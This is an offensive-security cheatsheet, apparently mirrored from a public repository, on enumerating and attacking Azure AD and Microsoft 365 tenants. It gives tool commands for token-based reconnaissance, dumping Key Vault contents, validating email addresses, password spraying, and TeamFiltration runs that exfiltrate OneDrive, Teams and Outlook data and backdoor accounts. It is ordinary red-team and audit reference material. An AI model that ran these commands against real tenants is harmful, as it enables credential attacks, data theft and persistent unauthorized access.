daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

azure-enumeration.md (12200B)


      1 ---
      2 title: "Azure AD - Enumerate"
      3 section: "Cloud"
      4 sectionSlug: "cloud"
      5 sourcePath: "docs/cloud/azure/azure-enumeration.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/cloud/azure/azure-enumeration.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Azure AD - Enumerate
     12 
     13 ## Azure AD - Collectors
     14 
     15 * [**Microsoft Portals**](https://msportals.io/) - Microsoft Administrator Sites
     16 * [**dirkjanm/ROADTool**](https://github.com/dirkjanm/ROADtools) - A collection of Azure AD tools for offensive and defensive security purposes
     17 
     18     ```ps1
     19     roadrecon auth --access-token eyJ0eXA...
     20     roadrecon auth --prt-cookie <primary-refresh-token> -r msgraph -c "1950a258-227b-4e31-a9cf-717495945fc2"
     21     roadrecon gather
     22     roadrecon gui
     23     ```
     24 
     25 * [**BloodHoundAD/AzureHound**](https://github.com/BloodHoundAD/AzureHound) - Azure Data Exporter for BloodHound
     26 
     27     ```ps1
     28     ./azurehound --refresh-token <refresh-token> list --tenant "<target-tenant-id>" -o output.json
     29     ./azurehound -u "<username>@contoso.onmicrosoft.com" -p "<password>" list groups --tenant "<tenant>.onmicrosoft.com"
     30     ./azurehound -j "<jwt>" list users --tenant "<tenant>.onmicrosoft.com"
     31     ```
     32 
     33 * [**BloodHoundAD/BARK**](https://github.com/BloodHoundAD/BARK) - BloodHound Attack Research Kit
     34 
     35     ```ps1
     36     . .\BARK.ps1
     37     $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
     38     $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
     39     $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
     40     ```
     41 
     42 * [**dafthack/GraphRunner**](https://github.com/dafthack/GraphRunner) - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
     43 
     44     ```ps1
     45     Invoke-GraphRecon -Tokens $tokens -PermissionEnum
     46     Invoke-DumpCAPS -Tokens $tokens -ResolveGuids
     47     Invoke-DumpApps -Tokens $tokens
     48     Get-DynamicGroups -Tokens $tokens
     49     ```
     50 
     51 * [**NetSPI/MicroBurst**](https://github.com/NetSPI/MicroBurst) - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
     52 
     53     ```powershell
     54     PS C:> Import-Module .\MicroBurst.psm1
     55     PS C:> Import-Module .\Get-AzureDomainInfo.ps1
     56     PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
     57     ```
     58 
     59 * [**hausec/PowerZure**](https://github.com/hausec/PowerZure) - PowerShell framework to assess Azure security
     60 
     61     ```powershell
     62     Import-Module .\Powerzure.psd1
     63     Set-Subscription -Id [idgoeshere]
     64     Get-AzureTarget
     65     Get-AzureInTuneScript
     66     Show-AzureKeyVaultContent -All
     67     ```
     68 
     69 * [**silverhack/monkey365**](https://github.com/silverhack/monkey365) - Microsoft 365, Azure subscriptions and Microsoft Entra ID security configuration reviews.
     70 
     71     ```powershell
     72     Get-ChildItem -Recurse c:\monkey365 | Unblock-File
     73     Import-Module C:\temp\monkey365
     74     Get-Help Invoke-Monkey365
     75     Get-Help Invoke-Monkey365 -Examples
     76     Get-Help Invoke-Monkey365 -Detailed
     77     ```
     78 
     79 * [**prowler-cloud/prowler**](https://github.com/prowler-cloud/prowler) - Prowler is an Open Source Security tool for AWS, Azure, GCP and Kubernetes to do security assessments, audits, incident response, compliance, continuous monitoring, hardening and forensics readiness. Includes CIS, NIST 800, NIST CSF, CISA, FedRAMP, PCI-DSS, GDPR, HIPAA, FFIEC, SOC2, GXP, Well-Architected Security, ENS and more
     80 * [**projectdiscovery/nuclei-templates**](https://github.com/projectdiscovery/nuclei-templates/tree/main/cloud/azure) - Community curated list of templates for the nuclei engine to find security vulnerabilities.
     81 
     82     ```ps1
     83     nuclei -t ~/nuclei-templates/cloud/azure/ -code -v
     84     ```
     85 
     86 * [**nccgroup/ScoutSuite**](https://github.com/nccgroup/ScoutSuite) - Multi-Cloud Security Auditing Tool
     87 * [**Flangvik/TeamFiltration**](https://github.com/Flangvik/TeamFiltration) - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
     88 
     89     ```ps1
     90     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
     91     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad 
     92     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
     93     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
     94     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
     95     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
     96     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
     97     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
     98     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
     99     ```
    100 
    101 * [**Azure/StormSpotter**](https://github.com/Azure/Stormspotter) - :warning: This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
    102 * [**nccgroup/Azucar**](https://github.com/nccgroup/azucar.git) - :warning: This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
    103 * [**FSecureLABS/Azurite**](https://github.com/FSecureLABS/Azurite) - :warning: This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
    104 * [**cyberark/SkyArk**](https://github.com/cyberark/SkyArk) - :warning: This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
    105 
    106 ## Azure AD - User Enumeration
    107 
    108 ### Enumerate Tenant Informations
    109 
    110 * Federation with Azure AD or O365
    111 
    112     ```powershell
    113     Get-AADIntLoginInformation -UserName <USER>@<TENANT NAME>.onmicrosoft.com
    114     https://login.microsoftonline.com/getuserrealm.srf?login=<USER>@<DOMAIN>&xml=1
    115     https://login.microsoftonline.com/getuserrealm.srf?login=root@<TENANT NAME>.onmicrosoft.com&xml=1
    116     ```
    117 
    118 * Get the Tenant ID
    119 
    120     ```powershell
    121     Get-AADIntTenantID -Domain <TENANT NAME>.onmicrosoft.com
    122     https://login.microsoftonline.com/<DOMAIN>/.well-known/openid-configuration
    123     https://login.microsoftonline.com/<TENANT NAME>.onmicrosoft.com/.well-known/openid-configuration
    124     ```
    125 
    126 ### Enumerate from a Guest Account
    127 
    128 ```ps1
    129 powerpwn recon --tenant {tenantId} --cache-path {path}
    130 powerpwn dump -tenant {tenantId} --cache-path {path}
    131 powerpwn gui --cache-path {path}
    132 ```
    133 
    134 ### Enumerate Emails
    135 
    136 > By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
    137 
    138 * Validate email
    139 
    140     ```powershell
    141     PS> C:\Python27\python.exe C:\Tools\o365creeper\o365creeper.py -f C:\Tools\emails.txt -o C:\Tools\validemails.txt
    142     admin@<TENANT NAME>.onmicrosoft.com   - VALID
    143     root@<TENANT NAME>.onmicrosoft.com    - INVALID
    144     test@<TENANT NAME>.onmicrosoft.com    - VALID
    145     contact@<TENANT NAME>.onmicrosoft.com - INVALID
    146     ```
    147 
    148 * Extract email lists with a valid credentials : [nyxgeek/o365recon](https://github.com/nyxgeek/o365recon)
    149 
    150     ```powershell
    151     Install-Module MSOnline
    152     Install-Module AzureAD
    153     .\o365recon.ps1 -azure
    154     ```
    155 
    156 ### Password Spraying
    157 
    158 The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds.
    159 
    160 * [dafthack/MSOLSpray](https://github.com/dafthack/MSOLSpray)
    161 
    162     ```powershell
    163     PS> . C:\Tools\MSOLSpray\MSOLSpray.ps1
    164     PS> Invoke-MSOLSpray -UserList C:\Tools\validemails.txt -Password <PASSWORD> -Verbose
    165     PS> Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
    166     PS> Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
    167     ```
    168 
    169 * [0xZDH/o365spray](https://github.com/0xZDH/o365spray)
    170 
    171     ```powershell
    172     o365spray --spray -U usernames.txt -P passwords.txt --count 2 --lockout 5 --domain test.com
    173     ```
    174 
    175 * [Flangvik/TeamFiltration](https://github.com/Flangvik/TeamFiltration)
    176 
    177     ```powershell
    178     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
    179     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
    180     TeamFiltration.exe --outpath  C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
    181     ```
    182 
    183 ## Azure Services Enumeration
    184 
    185 ### Enumerate Tenant Domains
    186 
    187 Extract openly available information for the given tenant: [aadinternals.com/osint](https://aadinternals.com/osint/)
    188 
    189 ```ps1
    190 Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
    191 Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
    192 Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
    193 ```
    194 
    195 ### Enumerate Azure Subdomains
    196 
    197 ```powershell
    198 PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
    199 PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
    200 Subdomain Service
    201 --------- -------
    202 <TENANT NAME>.mail.protection.outlook.com Email
    203 <TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
    204 ```
    205 
    206 ### Enumerate Services
    207 
    208 * Using Az Powershell module
    209 
    210     ```powershell
    211     # Enumerate resources
    212     PS Az> Get-AzResource
    213 
    214     # List all VM's the user has access to
    215     PS Az> Get-AzVM 
    216 
    217     # Get all webapps
    218     PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
    219 
    220     # Get all function apps
    221     PS Az> Get-AzFunctionApp
    222 
    223     # List all storage accounts
    224     PS Az> Get-AzStorageAccount
    225 
    226     # List all keyvaults
    227     PS Az> Get-AzKeyVault
    228 
    229     # Get all application objects registered using the current tenant
    230     PS AzureAD> Get-AzureADApplication -All $true
    231 
    232     # Enumerate role assignments
    233     PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
    234     PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
    235 
    236     # Check AppID Alternative Names/Display Name 
    237     PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
    238     ```
    239 
    240 * Using az cli
    241 
    242     ```powershell
    243     PS> az vm list
    244     PS> az vm list --query "[].[name]" -o table
    245     PS> az webapp list
    246     PS> az functionapp list --query "[].[name]" -o table
    247     PS> az storage account list
    248     PS> az keyvault list
    249     ```
    250 
    251 ## Multi Factor Authentication
    252 
    253 * [dafthack/MFASweep](https://github.com/dafthack/MFASweep) - A tool for checking if MFA is enabled on multiple Microsoft Services
    254 
    255 ```ps1
    256 Import-Module .\MFASweep.ps1
    257 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020
    258 Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2020 -Recon -IncludeADFS
    259 ```
    260 
    261 ## References
    262 
    263 * [Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020](https://o365blog.com/post/mdm/)
    264 * [CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course](https://github.com/0xJs/CARTP-cheatsheet/blob/main/Authenticated-enumeration.md)
    265 * [Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020](https://posts.specterops.io/attacking-azure-azure-ad-and-introducing-powerzure-ca70b330511a)
    266 * [Training - Attacking and Defending Azure Lab - Altered Security](https://www.alteredsecurity.com/azureadlab)
    267 * [Azure Config Review - Nuclei Templates v10.0.0 - Prince Chaddha - Sep 12, 2024](https://blog.projectdiscovery.io/azure-config-review-with-nuclei/)